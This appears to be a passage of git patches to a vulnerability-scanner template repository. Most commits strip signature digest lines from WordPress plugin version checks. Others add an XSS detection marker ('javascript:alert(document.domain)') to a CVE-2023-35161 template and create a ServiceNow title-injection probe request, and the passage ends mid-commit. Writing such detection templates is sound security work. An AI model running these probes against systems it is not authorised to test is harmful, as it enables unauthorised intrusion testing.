4a0a00473045022069c60f6305660b2b3a0312729c97b0ac394e4fdef0782aaacbd4e27b6e36b14f0221008fd5cae9a48a0382c3ac0d245898d02c5c6caf0808abef87491c5c97d056ded1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 65c11b34220..59554defdfc 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d6707556020e7434d5554f3ccc3c6445aeaf934b9485df130951482870ca76e5022100f6a7908858d413cf096d08c2ae2057ed34a0405a684251fcadcd2cb85e1fa145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 6e50bc1404e..350fd9436b4 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f5b37cb0892154113671d5114242fa788a721615c2c8289424dd537bd5d1932c0221008cb14ae51dda6f5c3b6243d4dfe69a3e52984d261ed6276c3522c3a9cf9f5134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 45262f7340f..2ae6bafbbab 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e4ec0d08de6d47fbc299a22a289ccd74e515ebe94e3178674840028b40d19200220566318575fb3f1e85f9fdf1fd871327fc371ac3c65c80d4a598a57c9f94ca0f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index f45a438e405..d0dc8d92bb9 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062a93088fe25103a4e0e9b75599455fdcd739914a818f83bc52c0e06d4b06a420220221ac7e0a0aa2849a1b1f72bd133a5c5955e416bc1f4294066a0592296b82dcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 14505ca911f..c49bbc2b6d1 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100acf7013c8f9c9faaaca7f585991b49534d00832440e2f9c4a65ca85792a8df6b02206d5527ac39a0b8786be011644d0e2ee3fdc29ef7163c8443b55f35ad5c4a2a38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 68657c9af9d..27586cbd9d1 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058d2d8fb42fb3932dcb340bbcf41c00241c9856179a9be9964ee8971a8675895022100dfa379ecf00e0972a11c489d28219e884a1487dd7f55e940a12c1cceb2efdc6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index a441a9038c2..946272f0a90 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a7719008ee6655fd674a8f5754dbb4cbb94259157d2b15fbb2fe651f2246c90c0221008199f9bd2e2e2c402c2a1e4512717ba3d46cec0a2d639006b443a0e94f032e3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index a4d82d9f4f1..aa297068720 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008aee7f7412013f95a1c73e4128d2ce63a640a9a0d3b1c0abffe2734858199851022100e0364b110f6242be1184e4051a12c99b302a3038e0ce359479753115de72073a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 53d5907fa70..290d53ab7ed 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a9c2a0b45c1c059201286f2edf3493121a41284a3b08b548b0ffba2cd0af495202203d97fcaab9f6ebdffc8b6ea327eba4104f97de855b60424555b45fc60b438005:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 93718180afe..e83e8d79e78 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac049911eec8229c0a6b272077d959fe3a3019db461a28c6b224e48d804b8b6b022100a06830adee7ee99705836d70a35ee3e766176e62ecdfe443aa1a5afb89610cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 5735b0c39b7..f1c16275a2a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100843e4d6cb7d4a570e548e402c61c4a2eaea5731939d620105eb161e102a8dde202203df7e9d0d33fffbb8d1e0ece5f60898b809605760f255bbf99e0911ff91ef851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index ee2d0fbc6a1..fc072e19d8a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f276c57a57d0f222d0a7ceb0613eb7287da33b602ba28af09802db4720a87cf70220073ff02d110b32856c063494eb4a88c85b028df62366da62ceb111622cc5ea2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e1c63521aa2..da9df0e8a5c 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200f2f827f5ba70a7f9b69e0af11a1268c82b07fbac66b887dae6974b343084197022100c892272f04f4017c27fb857995e5148181d28accbd5baeb9978394edad4b7233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 168fe2a84a9..f8113d97506 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e78cb7493d811e1f644469f09586bb68a5904b82ed8893e617bc0460ef15a21022100f4399115613d9f3cb9a89434f658d1e1e6efc6caa5fb5b2b5eea4daa7284bf6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 4e778e70d47..5f80282ab22 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055090c452a4e1c00bce02cd115085eba262336a32d779ff6d3fb330a244bcb2902203d806ec592b96d9eee5b9e1f7dbc3f118a72d67187ce34c4c59a5d46fe458736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 1ae6610241e..5725d5bb3f8 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c5e65aaeeb0358fa326f598e24b62d0fbea59e7ec0f4a2fd8331693fab4219a02202d52748eb369a290713bd6e000b7a9f716b5bb5820f6632467ecece6420281e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 87127ee06e9..f67a8bc18a8 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009dfd02fb0065bb01d2c809844cb913ace1a51f3a27cfd466e49968845e8fcf370220424b8bcc5e1524d74e2c407777d97c0446674ab3a067571c7bf65d3362730faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 802176a6f97..b9bd4be0a8b 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e12594e3dd9f6f8f59f993e16368a397c88257375a507a61d65cf218346f5af022100b3a6dab066176c8142958d8b08e7c08ae545bea00eefef9c199811141195de51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 5a7b337328c..bece4ce486a 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207574f851b4ea5cb3448b1301acbd81a44b09e7fcfbfd341ef680a44dea630229022058d84dbd07cd530bfadd25493eef59d27f9ad8c72ad101089fb78cc790947cc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index aefa11783f8..138b0aa9a69 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c33ab9a31d9c797e11298547605a2efb1c4d730bdb46544481174b8ae8620bcb022100ee6bdb6f99dea48a396fe239c9873090bea470576fff51cf49eb2e79fa52184c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index feabdfd1dd9..68bf71bc839 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203df8304ab0b06bef72797f798f661fc2b62bf6e1ad115e53f11397884c300b5e02203d537c30b823070c36b56abb8774b541d5fd49eb2c312f6bd1adcd357401c8bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 23223d28397..10dad2d2fb8 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204c83107b4dfad6114f54dd4d892cd05f28f908c59448f857f6461456991c197d022100b2f6c39dd076a79ffb194e8b1adbff7b34c33eee3c2eae4b1616fe2d248d2a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f25ec120a04..e9efe6fb53a 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0eebadf8b2adcc377296bacab46dfb8112a58fb4f97c299c284bc7615fab51e0220782881cab6f4112463714a5da7ad803286b382b9c921b6da30266c3b07fd5ec1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 92d2a1e82a9..c3d10f01359 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100922778079cce903cabc2cb290333c920c8b7996c5d1803d58280b06d1acc388d022100de2235b9c1492e9c9650eacef31abf6a392f3688dce0b328267d929cb66b7855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 71bf00763d4..4a8bc6b75c7 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2be633d9abc487755d7ddfe461867f1d08c43766d68f9d17ca62c2eaa9e88e8022030423560e94ce4d19f6e8526503dc6440b461080de75e24d615fa1a3b05e5686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index fa7c190b4d1..d2c74355bd7 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210089554f8f3fb67164c36fc320a486bcea8ea19b28bfd02c93d0c9dec2c728cfeb022100cd1f82b0747312e90fff873728219f8cb0e714a0e1e0b8960fda1ef43e3ec0f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 63160cc442d..94b8494b08d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220079f1182fde2e0d9e1e86ce8f0eae179064c795e285cc440ba6f49cb3091df51022100c51b2fa96188d631a2799c553ee56d0cac6b22b18a15c8e5fbef6f0677d6f661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 8f405e9ff6d..108aba79e99 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f9efea9a299f231a68a2560f55fa0f2dfb6f9c3a962ff58d5f15af42e2befff022014b8c6d7899f71c3a9b90d2459163146c06b2d57d3bccc46ea80121c33b93e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 3560ece294e..f6f6bf55667 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ed379ba66ced620a755e0f62d753bc88ff1b61f5cbd1ec7160907d92fbac007f0220217cd734bebdb2f821d1b9b6611628a5f05d83beba84297884ecbd50a1788da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index c5ec0ed0f70..483cb7cac74 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100825094f226c62f2004cfa592a07809dcafe56df399b1ca1525f64f8e40f71fb402210087af4f1deb6ab28732cf7c4b645cc6f899a2c45b30f7e2631d34ae5bb3f1bcca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index b956ba5218a..a132c98df49 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a3aa28122c563585602b13d9e836fa24a58362fce6cd6c49fc0ccc23727bfef02207bdd25881d93bb7758d530051fd72231c222241bf9062080abb37807b8b72d9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 61fa7557cf7..135bbee0467 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203fec15ea84c7411a08f4d6839a1b7e75151d8946feb25079225883c36be461a302204f6f3ad5cc950305b91cf55c6433419502eeeee6e992eb0a8b2c9b6fdc07c8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 4b47b9cfa35..5b690d96c0d 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091777a51292d214376f2a52dd89175568a96c4a703f7288b292404634cfbe908022044bfa993e5eb9aa37863393f85a26ee046e26ae96135b38eef6bc3be5062346e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 725a62c0327..16c7d6cff55 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec4429a9c3ca80eb737cd8a3bafda682f245d1df33d8566ab80b42147834e620022003df917327acf63db661be360c792f0602b5a631b107228a96ba24ab169e8905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 9d697511cf0..ab099f357e3 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dda6393c24b1fe49835a83e4647103db26ec7b11763fa9f8fae7725e3af4fe6d0220106636e521aad9efd3c294826c88603ba7716ad74ccb04a11364922a5ec3988c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index e2933289cb7..ad0b8f8fed6 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b8f15d42c5160ee1b5ac249df0123c8f41367d1cada9bad692457bcbdea018c4022100ca13ba5ed04f84f58d1bfdaa9f3bde23a99a8e351291c9490d1e40a3794bd63c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 6d71b0e7dd1..aaaf0f9a172 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210086a3aa6270dd4f10754e2cb11a7e27c785a85c490bd43586466b48e976f4233e022067a3fc2aa6969c3bf11afbbd0793b99ff8b9642152737bff3b2fbea82f88adb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 1ba50d9c697..f943c7afebd 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f4eb5e20a3f18c6a950652ca5fd7765bb18aa85e877f6082b6a2f3d16b03d050022034c1a1516cc5152ef7099fb033283a1918e602d96204bf4412802c6716399ce9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 20a3667cafa..062e5c85b49 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7c944c93171309f1c47411347021ed82d75a4ad525414a98dcab7815dcd6b7b022060fc61974b13f947db13c83f7df5b6eefaf3d0e73dcb113df1e3037bb62eb135:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 654e7ca8a81..6dcfdda1174 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a547bf37b50b1e560ecb54022eaef44f9a540e67c9634e3604f50c2f5fc6e580022052dc1c411e225d8a5c20e040c1783786c734ff79e3b4ad6d0b4eaae584e728f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3fb4de072abead7852e03055ce316c04c5258eb1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 11 Jul 2024 07:53:56 +0700 Subject: [PATCH 035/247] Rename CNVD-2021-64035.yaml to CNVD-2021-64035.yaml --- http/cnvd/{2024 => 2021}/CNVD-2021-64035.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/cnvd/{2024 => 2021}/CNVD-2021-64035.yaml (99%) diff --git a/http/cnvd/2024/CNVD-2021-64035.yaml b/http/cnvd/2021/CNVD-2021-64035.yaml similarity index 99% rename from http/cnvd/2024/CNVD-2021-64035.yaml rename to http/cnvd/2021/CNVD-2021-64035.yaml index 01aae7b7864..08d1875a34f 100644 --- a/http/cnvd/2024/CNVD-2021-64035.yaml +++ b/http/cnvd/2021/CNVD-2021-64035.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a116aefbd81adb68a0b53bf166cbe04f64b398ec87ac359d0dad01ad68beccc3022100b0564611ca028726a04d132f781f9347cdede59a636b07f5e8e9d13aae1c2d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a116aefbd81adb68a0b53bf166cbe04f64b398ec87ac359d0dad01ad68beccc3022100b0564611ca028726a04d132f781f9347cdede59a636b07f5e8e9d13aae1c2d55:922c64590222798bb761d5b6d8e72950 From d73c530c3bdf22a9460f5a7a04060c1c6641993a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 11 Jul 2024 11:34:04 +0530 Subject: [PATCH 036/247] Fix FP CVE-2023-35161.yaml --- http/cves/2023/CVE-2023-35161.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-35161.yaml b/http/cves/2023/CVE-2023-35161.yaml index 4fc0f733c12..702f0126aed 100644 --- a/http/cves/2023/CVE-2023-35161.yaml +++ b/http/cves/2023/CVE-2023-35161.yaml @@ -43,6 +43,7 @@ http: words: - 'javascript:alert(document.domain)' - 'DeleteApplication' + - 'data-xwiki' condition: and - type: word @@ -54,4 +55,4 @@ http: status: - 200 - 401 -# digest: 490a004630440220754ce20184edbf704cd6f1e7e69a70f61dfa7503c16e166e04bb380a7576fca7022040bb69bfb99ba4aa9a3465fc7765917ae85b4e2f6fcd05c3789e9b5b41468356:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220754ce20184edbf704cd6f1e7e69a70f61dfa7503c16e166e04bb380a7576fca7022040bb69bfb99ba4aa9a3465fc7765917ae85b4e2f6fcd05c3789e9b5b41468356:922c64590222798bb761d5b6d8e72950 From 4be9df7a2a6839d238b303b7f4fb06317aea3432 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:03:16 +0530 Subject: [PATCH 037/247] Create servicenow-title-injection.yaml --- .../servicenow-title-injection.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 http/misconfiguration/servicenow-title-injection.yaml diff --git a/http/misconfiguration/servicenow-title-injection.yaml b/http/misconfiguration/servicenow-title-injection.yaml new file mode 100644 index 00000000000..19cec8bdd17 --- /dev/null +++ b/http/misconfiguration/servicenow-title-injection.yaml @@ -0,0 +1,19 @@ +id: servicenow-title-injection + +info: + name: Service Now - Title Injection + author: DhiyaneshDk + severity: high + +http: + - raw: + - | + GET /login.do?jvar_page_title= HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' From 